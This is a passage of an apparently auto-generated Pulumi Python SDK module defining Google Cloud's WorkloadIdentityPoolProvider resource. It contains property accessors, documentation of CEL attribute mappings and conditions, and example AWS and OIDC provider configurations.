You can also provide custom attributes by specifying `attribute.{custom_attribute}`,
where `{custom_attribute}` is the name of the custom attribute to be mapped. You can
define a maximum of 50 custom attributes. The maximum length of a mapped attribute key
is 100 characters, and the key may only contain the characters [a-z0-9_].
You can reference these attributes in IAM policies to define fine-grained access for a
workload to Google Cloud resources. For example:
* `google.subject`:
`principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}`
* `google.groups`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}`
* `attribute.{custom_attribute}`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}`
Each value must be a [Common Expression Language](https://opensource.google/projects/cel)
function that maps an identity provider credential to the normalized attribute specified
by the corresponding map key.
You can use the `assertion` keyword in the expression to access a JSON representation of
the authentication credential issued by the provider.
The maximum length of an attribute mapping expression is 2048 characters. When evaluated,
the total size of all mapped attributes must not exceed 8KB.
For AWS providers, the following rules apply:
- If no attribute mapping is defined, the following default mapping applies:
```python
import pulumi
```
- If any custom attribute mappings are defined, they must include a mapping to the
`google.subject` attribute.
For OIDC providers, the following rules apply:
- Custom attribute mappings must be defined, and must include a mapping to the
`google.subject` attribute. For example, the following maps the `sub` claim of the
incoming credential to the `subject` attribute on a Google token.
```python
import pulumi
```
:param pulumi.Input['WorkloadIdentityPoolProviderAwsArgs'] aws: An Amazon Web Services identity provider. Not compatible with the property oidc.
Structure is documented below.
:param pulumi.Input[str] description: A description for the provider. Cannot exceed 256 characters.
:param pulumi.Input[bool] disabled: Whether the provider is disabled. You cannot use a disabled provider to exchange tokens.
However, existing tokens still grant access.
:param pulumi.Input[str] display_name: A display name for the provider. Cannot exceed 32 characters.
:param pulumi.Input['WorkloadIdentityPoolProviderOidcArgs'] oidc: An OpenId Connect 1.0 identity provider. Not compatible with the property aws.
Structure is documented below.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
pulumi.set(__self__, "workload_identity_pool_id", workload_identity_pool_id)
pulumi.set(__self__, "workload_identity_pool_provider_id", workload_identity_pool_provider_id)
if attribute_condition is not None:
pulumi.set(__self__, "attribute_condition", attribute_condition)
if attribute_mapping is not None:
pulumi.set(__self__, "attribute_mapping", attribute_mapping)
if aws is not None:
pulumi.set(__self__, "aws", aws)
if description is not None:
pulumi.set(__self__, "description", description)
if disabled is not None:
pulumi.set(__self__, "disabled", disabled)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if oidc is not None:
pulumi.set(__self__, "oidc", oidc)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter(name="workloadIdentityPoolId")
def workload_identity_pool_id(self) -> pulumi.Input[str]:
"""
The ID used for the pool, which is the final component of the pool resource name. This
value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
"""
return pulumi.get(self, "workload_identity_pool_id")
@workload_identity_pool_id.setter
def workload_identity_pool_id(self, value: pulumi.Input[str]):
pulumi.set(self, "workload_identity_pool_id", value)
@property
@pulumi.getter(name="workloadIdentityPoolProviderId")
def workload_identity_pool_provider_id(self) -> pulumi.Input[str]:
"""
The ID for the provider, which becomes the final component of the resource name. This
value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
"""
return pulumi.get(self, "workload_identity_pool_provider_id")
@workload_identity_pool_provider_id.setter
def workload_identity_pool_provider_id(self, value: pulumi.Input[str]):
pulumi.set(self, "workload_identity_pool_provider_id", value)
@property
@pulumi.getter(name="attributeCondition")
def attribute_condition(self) -> Optional[pulumi.Input[str]]:
"""
[A Common Expression Language](https://opensource.google/projects/cel) expression, in
plain text, to restrict what otherwise valid authentication credentials issued by the
provider should not be accepted.
The expression must output a boolean representing whether to allow the federation.
The following keywords may be referenced in the expressions:
* `assertion`: JSON representing the authentication credential issued by the provider.
* `google`: The Google attributes mapped from the assertion in the `attribute_mappings`.
* `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`.
The maximum length of the attribute condition expression is 4096 characters. If
unspecified, all valid authentication credentials are accepted.
The following example shows how to only allow credentials with a mapped `google.groups`
value of `admins`:
```python
import pulumi
```
"""
return pulumi.get(self, "attribute_condition")
@attribute_condition.setter
def attribute_condition(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "attribute_condition", value)
@property
@pulumi.getter(name="attributeMapping")
def attribute_mapping(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Maps attributes from authentication credentials issued by an external identity provider
to Google Cloud attributes, such as `subject` and `segment`.
Each key must be a string specifying the Google Cloud IAM attribute to map to.
The following keys are supported:
* `google.subject`: The principal IAM is authenticating. You can reference this value
in IAM bindings. This is also the subject that appears in Cloud Logging logs.
Cannot exceed 127 characters.
* `google.groups`: Groups the external identity belongs to. You can grant groups
access to resources using an IAM `principalSet` binding; access applies to all
members of the group.
You can also provide custom attributes by specifying `attribute.{custom_attribute}`,
where `{custom_attribute}` is the name of the custom attribute to be mapped. You can
define a maximum of 50 custom attributes. The maximum length of a mapped attribute key
is 100 characters, and the key may only contain the characters [a-z0-9_].
You can reference these attributes in IAM policies to define fine-grained access for a
workload to Google Cloud resources. For example:
* `google.subject`:
`principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}`
* `google.groups`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}`
* `attribute.{custom_attribute}`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}`
Each value must be a [Common Expression Language](https://opensource.google/projects/cel)
function that maps an identity provider credential to the normalized attribute specified
by the corresponding map key.
You can use the `assertion` keyword in the expression to access a JSON representation of
the authentication credential issued by the provider.
The maximum length of an attribute mapping expression is 2048 characters. When evaluated,
the total size of all mapped attributes must not exceed 8KB.
For AWS providers, the following rules apply:
- If no attribute mapping is defined, the following default mapping applies:
```python
import pulumi
```
- If any custom attribute mappings are defined, they must include a mapping to the
`google.subject` attribute.
For OIDC providers, the following rules apply:
- Custom attribute mappings must be defined, and must include a mapping to the
`google.subject` attribute. For example, the following maps the `sub` claim of the
incoming credential to the `subject` attribute on a Google token.
```python
import pulumi
```
"""
return pulumi.get(self, "attribute_mapping")
@attribute_mapping.setter
def attribute_mapping(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "attribute_mapping", value)
@property
@pulumi.getter
def aws(self) -> Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]:
"""
An Amazon Web Services identity provider. Not compatible with the property oidc.
Structure is documented below.
"""
return pulumi.get(self, "aws")
@aws.setter
def aws(self, value: Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]):
pulumi.set(self, "aws", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description for the provider. Cannot exceed 256 characters.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def disabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the provider is disabled. You cannot use a disabled provider to exchange tokens.
However, existing tokens still grant access.
"""
return pulumi.get(self, "disabled")
@disabled.setter
def disabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disabled", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
A display name for the provider. Cannot exceed 32 characters.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def oidc(self) -> Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]:
"""
An OpenId Connect 1.0 identity provider. Not compatible with the property aws.
Structure is documented below.
"""
return pulumi.get(self, "oidc")
@oidc.setter
def oidc(self, value: Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]):
pulumi.set(self, "oidc", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@pulumi.input_type
class _WorkloadIdentityPoolProviderState:
def __init__(__self__, *,
attribute_condition: Optional[pulumi.Input[str]] = None,
attribute_mapping: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
aws: Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
display_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
oidc: Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']] = None,
project: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
workload_identity_pool_id: Optional[pulumi.Input[str]] = None,
workload_identity_pool_provider_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering WorkloadIdentityPoolProvider resources.
:param pulumi.Input[str] attribute_condition: [A Common Expression Language](https://opensource.google/projects/cel) expression, in
plain text, to restrict what otherwise valid authentication credentials issued by the
provider should not be accepted.
The expression must output a boolean representing whether to allow the federation.
The following keywords may be referenced in the expressions:
* `assertion`: JSON representing the authentication credential issued by the provider.
* `google`: The Google attributes mapped from the assertion in the `attribute_mappings`.
* `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`.
The maximum length of the attribute condition expression is 4096 characters. If
unspecified, all valid authentication credentials are accepted.
The following example shows how to only allow credentials with a mapped `google.groups`
value of `admins`:
```python
import pulumi
```
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] attribute_mapping: Maps attributes from authentication credentials issued by an external identity provider
to Google Cloud attributes, such as `subject` and `segment`.
Each key must be a string specifying the Google Cloud IAM attribute to map to.
The following keys are supported:
* `google.subject`: The principal IAM is authenticating. You can reference this value
in IAM bindings. This is also the subject that appears in Cloud Logging logs.
Cannot exceed 127 characters.
* `google.groups`: Groups the external identity belongs to. You can grant groups
access to resources using an IAM `principalSet` binding; access applies to all
members of the group.
You can also provide custom attributes by specifying `attribute.{custom_attribute}`,
where `{custom_attribute}` is the name of the custom attribute to be mapped. You can
define a maximum of 50 custom attributes. The maximum length of a mapped attribute key
is 100 characters, and the key may only contain the characters [a-z0-9_].
You can reference these attributes in IAM policies to define fine-grained access for a
workload to Google Cloud resources. For example:
* `google.subject`:
`principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}`
* `google.groups`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}`
* `attribute.{custom_attribute}`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}`
Each value must be a [Common Expression Language](https://opensource.google/projects/cel)
function that maps an identity provider credential to the normalized attribute specified
by the corresponding map key.
You can use the `assertion` keyword in the expression to access a JSON representation of
the authentication credential issued by the provider.
The maximum length of an attribute mapping expression is 2048 characters. When evaluated,
the total size of all mapped attributes must not exceed 8KB.
For AWS providers, the following rules apply:
- If no attribute mapping is defined, the following default mapping applies:
```python
import pulumi
```
- If any custom attribute mappings are defined, they must include a mapping to the
`google.subject` attribute.
For OIDC providers, the following rules apply:
- Custom attribute mappings must be defined, and must include a mapping to the
`google.subject` attribute. For example, the following maps the `sub` claim of the
incoming credential to the `subject` attribute on a Google token.
```python
import pulumi
```
:param pulumi.Input['WorkloadIdentityPoolProviderAwsArgs'] aws: An Amazon Web Services identity provider. Not compatible with the property oidc.
Structure is documented below.
:param pulumi.Input[str] description: A description for the provider. Cannot exceed 256 characters.
:param pulumi.Input[bool] disabled: Whether the provider is disabled. You cannot use a disabled provider to exchange tokens.
However, existing tokens still grant access.
:param pulumi.Input[str] display_name: A display name for the provider. Cannot exceed 32 characters.
:param pulumi.Input[str] name: The resource name of the provider as
'projects/{project_number}/locations/global/workloadIdentityPools/{workload_identity_pool_id}/providers/{workload_identity_pool_provider_id}'.
:param pulumi.Input['WorkloadIdentityPoolProviderOidcArgs'] oidc: An OpenId Connect 1.0 identity provider. Not compatible with the property aws.
Structure is documented below.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] state: The state of the provider. * STATE_UNSPECIFIED: State unspecified. * ACTIVE: The provider is active, and may be used to
validate authentication credentials. * DELETED: The provider is soft-deleted. Soft-deleted providers are permanently
deleted after approximately 30 days. You can restore a soft-deleted provider using UndeleteWorkloadIdentityPoolProvider.
You cannot reuse the ID of a soft-deleted provider until it is permanently deleted.
:param pulumi.Input[str] workload_identity_pool_id: The ID used for the pool, which is the final component of the pool resource name. This
value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
:param pulumi.Input[str] workload_identity_pool_provider_id: The ID for the provider, which becomes the final component of the resource name. This
value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
"""
if attribute_condition is not None:
pulumi.set(__self__, "attribute_condition", attribute_condition)
if attribute_mapping is not None:
pulumi.set(__self__, "attribute_mapping", attribute_mapping)
if aws is not None:
pulumi.set(__self__, "aws", aws)
if description is not None:
pulumi.set(__self__, "description", description)
if disabled is not None:
pulumi.set(__self__, "disabled", disabled)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if name is not None:
pulumi.set(__self__, "name", name)
if oidc is not None:
pulumi.set(__self__, "oidc", oidc)
if project is not None:
pulumi.set(__self__, "project", project)
if state is not None:
pulumi.set(__self__, "state", state)
if workload_identity_pool_id is not None:
pulumi.set(__self__, "workload_identity_pool_id", workload_identity_pool_id)
if workload_identity_pool_provider_id is not None:
pulumi.set(__self__, "workload_identity_pool_provider_id", workload_identity_pool_provider_id)
@property
@pulumi.getter(name="attributeCondition")
def attribute_condition(self) -> Optional[pulumi.Input[str]]:
"""
[A Common Expression Language](https://opensource.google/projects/cel) expression, in
plain text, to restrict what otherwise valid authentication credentials issued by the
provider should not be accepted.
The expression must output a boolean representing whether to allow the federation.
The following keywords may be referenced in the expressions:
* `assertion`: JSON representing the authentication credential issued by the provider.
* `google`: The Google attributes mapped from the assertion in the `attribute_mappings`.
* `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`.
The maximum length of the attribute condition expression is 4096 characters. If
unspecified, all valid authentication credentials are accepted.
The following example shows how to only allow credentials with a mapped `google.groups`
value of `admins`:
```python
import pulumi
```
"""
return pulumi.get(self, "attribute_condition")
@attribute_condition.setter
def attribute_condition(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "attribute_condition", value)
@property
@pulumi.getter(name="attributeMapping")
def attribute_mapping(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Maps attributes from authentication credentials issued by an external identity provider
to Google Cloud attributes, such as `subject` and `segment`.
Each key must be a string specifying the Google Cloud IAM attribute to map to.
The following keys are supported:
* `google.subject`: The principal IAM is authenticating. You can reference this value
in IAM bindings. This is also the subject that appears in Cloud Logging logs.
Cannot exceed 127 characters.
* `google.groups`: Groups the external identity belongs to. You can grant groups
access to resources using an IAM `principalSet` binding; access applies to all
members of the group.
You can also provide custom attributes by specifying `attribute.{custom_attribute}`,
where `{custom_attribute}` is the name of the custom attribute to be mapped. You can
define a maximum of 50 custom attributes. The maximum length of a mapped attribute key
is 100 characters, and the key may only contain the characters [a-z0-9_].
You can reference these attributes in IAM policies to define fine-grained access for a
workload to Google Cloud resources. For example:
* `google.subject`:
`principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}`
* `google.groups`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}`
* `attribute.{custom_attribute}`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}`
Each value must be a [Common Expression Language](https://opensource.google/projects/cel)
function that maps an identity provider credential to the normalized attribute specified
by the corresponding map key.
You can use the `assertion` keyword in the expression to access a JSON representation of
the authentication credential issued by the provider.
The maximum length of an attribute mapping expression is 2048 characters. When evaluated,
the total size of all mapped attributes must not exceed 8KB.
For AWS providers, the following rules apply:
- If no attribute mapping is defined, the following default mapping applies:
```python
import pulumi
```
- If any custom attribute mappings are defined, they must include a mapping to the
`google.subject` attribute.
For OIDC providers, the following rules apply:
- Custom attribute mappings must be defined, and must include a mapping to the
`google.subject` attribute. For example, the following maps the `sub` claim of the
incoming credential to the `subject` attribute on a Google token.
```python
import pulumi
```
"""
return pulumi.get(self, "attribute_mapping")
@attribute_mapping.setter
def attribute_mapping(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "attribute_mapping", value)
@property
@pulumi.getter
def aws(self) -> Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]:
"""
An Amazon Web Services identity provider. Not compatible with the property oidc.
Structure is documented below.
"""
return pulumi.get(self, "aws")
@aws.setter
def aws(self, value: Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]):
pulumi.set(self, "aws", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description for the provider. Cannot exceed 256 characters.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def disabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the provider is disabled. You cannot use a disabled provider to exchange tokens.
However, existing tokens still grant access.
"""
return pulumi.get(self, "disabled")
@disabled.setter
def disabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disabled", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
A display name for the provider. Cannot exceed 32 characters.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The resource name of the provider as
'projects/{project_number}/locations/global/workloadIdentityPools/{workload_identity_pool_id}/providers/{workload_identity_pool_provider_id}'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def oidc(self) -> Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]:
"""
An OpenId Connect 1.0 identity provider. Not compatible with the property aws.
Structure is documented below.
"""
return pulumi.get(self, "oidc")
@oidc.setter
def oidc(self, value: Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]):
pulumi.set(self, "oidc", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
The state of the provider.
* STATE_UNSPECIFIED: State unspecified.
* ACTIVE: The provider is active, and may be used to validate authentication credentials.
* DELETED: The provider is soft-deleted. Soft-deleted providers are permanently deleted
after approximately 30 days. You can restore a soft-deleted provider using
UndeleteWorkloadIdentityPoolProvider. You cannot reuse the ID of a soft-deleted provider
until it is permanently deleted.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="workloadIdentityPoolId")
def workload_identity_pool_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID used for the pool, which is the final component of the pool resource name. This
value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
"""
return pulumi.get(self, "workload_identity_pool_id")
@workload_identity_pool_id.setter
def workload_identity_pool_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "workload_identity_pool_id", value)
@property
@pulumi.getter(name="workloadIdentityPoolProviderId")
def workload_identity_pool_provider_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID for the provider, which becomes the final component of the resource name. This
value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
"""
return pulumi.get(self, "workload_identity_pool_provider_id")
@workload_identity_pool_provider_id.setter
def workload_identity_pool_provider_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "workload_identity_pool_provider_id", value)
class WorkloadIdentityPoolProvider(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
attribute_condition: Optional[pulumi.Input[str]] = None,
attribute_mapping: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
aws: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
display_name: Optional[pulumi.Input[str]] = None,
oidc: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']]] = None,
project: Optional[pulumi.Input[str]] = None,
workload_identity_pool_id: Optional[pulumi.Input[str]] = None,
workload_identity_pool_provider_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
A configuration for an external identity provider.
To get more information about WorkloadIdentityPoolProvider, see:
* [API documentation](https://cloud.google.com/iam/docs/reference/rest/v1beta/projects.locations.workloadIdentityPools.providers)
* How-to Guides
* [Managing workload identity providers](https://cloud.google.com/iam/docs/manage-workload-identity-pools-providers#managing_workload_identity_providers)
## Example Usage
### Iam Workload Identity Pool Provider Aws Basic
```python
import pulumi
import pulumi_gcp as gcp
pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool",
opts=pulumi.ResourceOptions(provider=google_beta))
example = gcp.iam.WorkloadIdentityPoolProvider("example",
workload_identity_pool_id=pool.workload_identity_pool_id,
workload_identity_pool_provider_id="example-prvdr",
aws=gcp.iam.WorkloadIdentityPoolProviderAwsArgs(
account_id="999999999999",
),
opts=pulumi.ResourceOptions(provider=google_beta))
```
### Iam Workload Identity Pool Provider Aws Full
```python
import pulumi
import pulumi_gcp as gcp
pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool",
opts=pulumi.ResourceOptions(provider=google_beta))
example = gcp.iam.WorkloadIdentityPoolProvider("example",
workload_identity_pool_id=pool.workload_identity_pool_id,
workload_identity_pool_provider_id="example-prvdr",
display_name="Name of provider",
description="AWS identity pool provider for automated test",
disabled=True,
attribute_condition="attribute.aws_role==\"arn:aws:sts::999999999999:assumed-role/stack-eu-central-1-lambdaRole\"",
attribute_mapping={
"google.subject": "assertion.arn",
"attribute.aws_account": "assertion.account",
"attribute.environment": "assertion.arn.contains(\":instance-profile/Production\") ? \"prod\" : \"test\"",
},
aws=gcp.iam.WorkloadIdentityPoolProviderAwsArgs(
account_id="999999999999",
),
opts=pulumi.ResourceOptions(provider=google_beta))
```
### Iam Workload Identity Pool Provider Oidc Basic
```python
import pulumi
import pulumi_gcp as gcp
pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool",
opts=pulumi.ResourceOptions(provider=google_beta))
example = gcp.iam.WorkloadIdentityPoolProvider("example",
workload_identity_pool_id=pool.workload_identity_pool_id,
workload_identity_pool_provider_id="example-prvdr",
attribute_mapping={
"google.subject": "assertion.sub",
},
oidc=gcp.iam.WorkloadIdentityPoolProviderOidcArgs(
issuer_uri="https://sts.windows.net/azure-tenant-id",
),
opts=pulumi.ResourceOptions(provider=google_beta))
```
### Iam Workload Identity Pool Provider Oidc Full
```python
import pulumi
import pulumi_gcp as gcp
pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool",
opts=pulumi.ResourceOptions(provider=google_beta))
example = gcp.iam.WorkloadIdentityPoolProvider("example",
workload_identity_pool_id=pool.workload_identity_pool_id,
workload_identity_pool_provider_id="example-prvdr",
display_name="Name of provider",
description="OIDC identity pool provider for automated test",
disabled=True,
attribute_condition="\"e968c2ef-047c-498d-8d79-16ca1b61e77e\" in assertion.groups",
attribute_mapping={
"google.subject": "\"azure::\" + assertion.tid + \"::\" + assertion.sub",
"attribute.tid": "assertion.tid",
"attribute.managed_identity_name": \"\"\" {
"8bb39bdb-1cc5-4447-b7db-a19e920eb111":"workload1",
"55d36609-9bcf-48e0-a366-a3cf19027d2a":"workload2"
}[assertion.oid]
\"\"\",
},
oidc=gcp.iam.WorkloadIdentityPoolProviderOidcArgs(
allowed_audiences=[
"https://example.com/gcp-oidc-federation",
"example.com/gcp-oidc-federation",
],
issuer_uri="https://sts.windows.net/azure-tenant-id",
),
opts=pulumi.ResourceOptions(provider=google_beta))
```
## Import
WorkloadIdentityPoolProvider can be imported using any of these accepted formats
```sh
$ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default projects/{{project}}/locations/global/workloadIdentityPools/{{workload_identity_pool_id}}/providers/{{workload_identity_pool_provider_id}}
```
```sh
$ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default {{project}}/{{workload_identity_pool_id}}/{{workload_identity_pool_provider_id}}
```
```sh
$ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default {{workload_identity_pool_id}}/{{workload_identity_pool_provider_id}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] attribute_condition: A [Common Expression Language](https://opensource.google/projects/cel) expression, in
plain text, that restricts which otherwise valid authentication credentials issued by the
provider are accepted.
The expression must output a boolean representing whether to allow the federation.
The following keywords may be referenced in the expressions:
* `assertion`: JSON representing the authentication credential issued by the provider.
* `google`: The Google attributes mapped from the assertion in the `attribute_mappings`.
* `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`.
The maximum length of the attribute condition expression is 4096 characters. If
unspecified, all valid authentication credentials are accepted.
The following example shows how to only allow credentials with a mapped `google.groups`
value of `admins`:
```python
import pulumi

# Illustrative sketch: accept only identities whose mapped `google.groups`
# value contains `admins`.
attribute_condition = "'admins' in google.groups"
```
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] attribute_mapping: Maps attributes from authentication credentials issued by an external identity provider
to Google Cloud attributes, such as `subject` and `segment`.
Each key must be a string specifying the Google Cloud IAM attribute to map to.
The following keys are supported:
* `google.subject`: The principal IAM is authenticating. You can reference this value
in IAM bindings. This is also the subject that appears in Cloud Logging logs.
Cannot exceed 127 characters.
* `google.groups`: Groups the external identity belongs to. You can grant groups
access to resources using an IAM `principalSet` binding; access applies to all
members of the group.
You can also provide custom attributes by specifying `attribute.{custom_attribute}`,
where `{custom_attribute}` is the name of the custom attribute to be mapped. You can
define a maximum of 50 custom attributes. The maximum length of a mapped attribute key
is 100 characters, and the key may only contain the characters [a-z0-9_].
You can reference these attributes in IAM policies to define fine-grained access for a
workload to Google Cloud resources. For example:
* `google.subject`:
`principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}`
* `google.groups`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}`
* `attribute.{custom_attribute}`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}`
Each value must be a [Common Expression Language](https://opensource.google/projects/cel)
function that maps an identity provider credential to the normalized attribute specified
by the corresponding map key.
You can use the `assertion` keyword in the expression to access a JSON representation of
the authentication credential issued by the provider.
The maximum length of an attribute mapping expression is 2048 characters. When evaluated,
the total size of all mapped attributes must not exceed 8KB.
For AWS providers, the following rules apply:
- If no attribute mapping is defined, the following default mapping applies:
```python
import pulumi
```
- If any custom attribute mappings are defined, they must include a mapping to the
`google.subject` attribute.
For OIDC providers, the following rules apply:
- Custom attribute mappings must be defined, and must include a mapping to the
`google.subject` attribute. For example, the following maps the `sub` claim of the
incoming credential to the `subject` attribute on a Google token.
```python
import pulumi

# Illustrative sketch: map the OIDC `sub` claim to `google.subject`.
attribute_mapping = {
    "google.subject": "assertion.sub",
}
```
:param pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']] aws: An Amazon Web Services identity provider. Not compatible with the property oidc.
Structure is documented below.
:param pulumi.Input[str] description: A description for the provider. Cannot exceed 256 characters.
:param pulumi.Input[bool] disabled: Whether the provider is disabled. You cannot use a disabled provider to exchange tokens.
However, existing tokens still grant access.
:param pulumi.Input[str] display_name: A display name for the provider. Cannot exceed 32 characters.
:param pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']] oidc: An OpenId Connect 1.0 identity provider. Not compatible with the property aws.
Structure is documented below.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] workload_identity_pool_id: The ID used for the pool, which is the final component of the pool resource name. This
value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
:param pulumi.Input[str] workload_identity_pool_provider_id: The ID for the provider, which becomes the final component of the resource name. This
value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: WorkloadIdentityPoolProviderArgs,
